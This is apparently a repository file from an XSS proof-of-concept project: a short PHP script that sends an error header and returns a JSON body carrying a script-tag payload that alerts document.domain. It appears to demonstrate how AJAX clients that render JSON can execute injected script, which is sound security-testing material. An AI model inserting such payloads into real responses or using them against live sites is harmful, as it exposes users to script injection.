Newer
Older
AJAX_JSON_XSS_POC / ajax_response.php
root on 30 Jun 2020 209 bytes initial commit
<?php

//header($_SERVER["SERVER_PROTOCOL"] . ' 500 Internal Server Error', true, 500);
header('HTTP/1.1 400 Tony Iz A Monkey', true, 401);

?>
{"body": "<script>alert(document.domain);</script> replaced..."}